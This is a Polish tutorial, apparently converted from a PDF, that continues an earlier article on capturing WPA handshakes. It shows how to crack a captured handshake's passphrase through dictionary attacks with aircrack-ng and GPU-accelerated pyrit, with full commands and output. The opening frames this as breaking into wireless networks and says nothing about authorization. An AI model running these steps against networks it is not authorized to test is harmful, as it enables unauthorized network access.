background image

[

WiFi] – Ataki na handshake 

WPA

Ten tutorial jest kontynuacją artykułu dotyczącego 

przechwytywania 

pakietów z handshake

pokazujący jak łatwo odzyskać hasło lub włamać się 

do sieci bezprzewodowej chronionej przez WPA/WPA2.
No dobra, pokażę Ci jak łamać szyfr z handshake. Tak wygląda okno 
programu airodump-ng gdy handshake został złapany, ale to już wiesz:

[

 

CH  1 

][

 Elapsed: 12 s 

][

 2011-01-12 17:24 

][

 WPA handshake: 

00:04:ED:A3:80:11

]

BSSID PWR RXQ Beacons 

#Data, #/s CH MB ENC CIPHER AUTH ESSID

 
00:04:

ED:A3:80:11 

-53

 40 130 27 9 1 54 WPA2 CCMP PSK NASA

 

BSSID STATION PWR Rate Lost Packets Probes

 
00:04:

ED:A3:80:11 48:5D:60:34:A8:59 0 0 

-54

 0 25 NASA

00:04:

ED:A3:80:11 00:4F:78:00:A2:A5 

-40

 24 - 1 28 25

Skoro już go masz to należy go teraz zepsuć!
Potrzebujemy do tego aircrack-ng żeby zepsuć, psujemy takim to 
poleceniem:

aircrack-ng 

-w

 slownik.txt 

-b

 00:04:ED:A3:80:11 NASA.cap

[

00:05:48

]

 664220 

keys tested 

(

2100.59 k/s

)

Current passphrase: imakinlazczsupzoR

 

Master Key : D9 06 78 99 66 B2 50 65 48 E1 99 7B 87 19 5F 7F

45 

F8 F9 48 28 A2 7C EF A7 90 E5 5C 80 BC FC 9A

 

Transient Key : 1B 05 70 73 25 45 7C DB 1E 95 73 37 0C F7 F2 24

26 56 

DD 2C 8B 09 0F 58 57 5F D8 4A EA D3 94 83

BC 48 F8 1E 84 4A 92 46 19 C3 48 BC 7B 21 6D 16
C3 19 AD 27 14 D0 76 33 44 32 65 FE 1F 8D 97 6C

 

EAPOL HMAC : 05 46 D3 00 99 FC A8 82 F8 CF C1 2B EC 87 F4 5F

W poleceniu użyto opcji ataku słownikowego, ponieważ mam bardzo duży 
słownik to często go używam

Aircrack-ng 1.0

[

00:11:45

]

 8914110 

keys tested 

(

2041.75 k/s

)

 

KEY FOUND! 

[

 haxored1 

]

 

Master Key : C6 AC CD E4 AF 58 CA 8A 51 8E C4 BC A1 50 F9 DE

72 55 48 

F6 E1 6F 26 23 2C 7F AA E6 8A 7F 98 6C

 

Transient Key : 86 CA 39 4F C6 9A C2 CD 2D 06 0F E9 83 E6 DE FC

3

F 24 70 D0 0C F6 B8 44 FB FE D5 5A 03 CF D3 94

background image

06 90 

AC C7 7F 41 EF DE DA 8D 72 89 B2 82 A3 4C

F1 69 2F E3 59 B9 73 1E A1 AF 67 57 DA 16 8A 11

 

EAPOL HMAC : 83 55 E7 96 C4 C4 96 C2 32 AF 5D 9B 40 81 AC F5

Zróbmy to szybciej!
W jednym z moich poprzednich tutoriali pokazywałem jak zainstalować 
pyrit wraz z cpyrit dla kart ATI z OCL.
Użyjemy teraz projektu z Summer Google Code do ataku na handshake. 
Narzędzie pyrit do tego ataku użyje mocy obliczeniowej CPU+GPU (u mnie 
jest to i7 740QM + ATI HD5730)
Proszę pamiętać, że pyrit to narzędzie do doświadczeń crackingu (słowa 
developera narzędzia).
Sprawdzamy czy w przechwyconych przez nas pakietach pyrit wykrywa 
dane handshake.

pyrit 

-r

 NASA-01.cap analyze

Pyrit 0.4.0-dev 

(

svn

 r288

)

 

(

C

)

 2008-2010 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+
Parsing 

file

 

'NASA-01.cap'

 

(

1/1

)

...

Parsed 7 packets 

(

7 802.11-packets

)

, got 1 AP

(

s

)

 

#1: 

AccessPoint 00:04:ed:a3:80:11 ('NASA'):

#1: 

Station 00:1f:e1:02:dc:9e

#2: 

Station 00:4f:78:00:a2:a5, 1 handshake(s):

#1: 

HMAC_SHA1_AES, good, spread 1

#3: 

Station 48:5d:60:34:a8:59

No skoro wykrywa to dowiedzmy się jakie jest hasło:

pyrit 

-r

 NASA-01.cap 

-i

 slownik.txt 

-b

 00:04:ED:A3:80:11 attack_passthrough

Pyrit 0.4.0-dev 

(

svn

 r288

)

 

(

C

)

 2008-2010 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+
Parsing 

file

 

'NASA-01.cap'

 

(

1/1

)

...

Parsed 7 packets 

(

7 802.11-packets

)

, got 1 AP

(

s

)

 

Tried 120006 PMKs so far; 12304 PMKs per second.

 

The password is 

'haxored1'

.

pyrit 

-r

 NASA-01.cap 

-i

 slownik.txt 

-b

 00:04:ED:A3:80:11 attack_passthrough

-

plik cap.

 -

i podajemy ścieżkę do słownika, który chcesz przeszukać za hasłem

-

<tutaj_bssid>

na końcu polecenia podaje się jaki ma być atak, dictionary-attack opisany 

jest jakoattack_passthrough

 

Komentarz od-autorski:
Nie, nie warto używać tęczowych tablic do ataków na WPA/WPA2, stracisz 

background image

miesiące (lata?) na tworzenie takich tablic, hasło w tym czasie może 
zostać zmienione, wtedy ponownie będzie trzeba uzyskać handshake. W 
tym wypadku słowniki są najlepszym rozwiązaniem.


Document Outline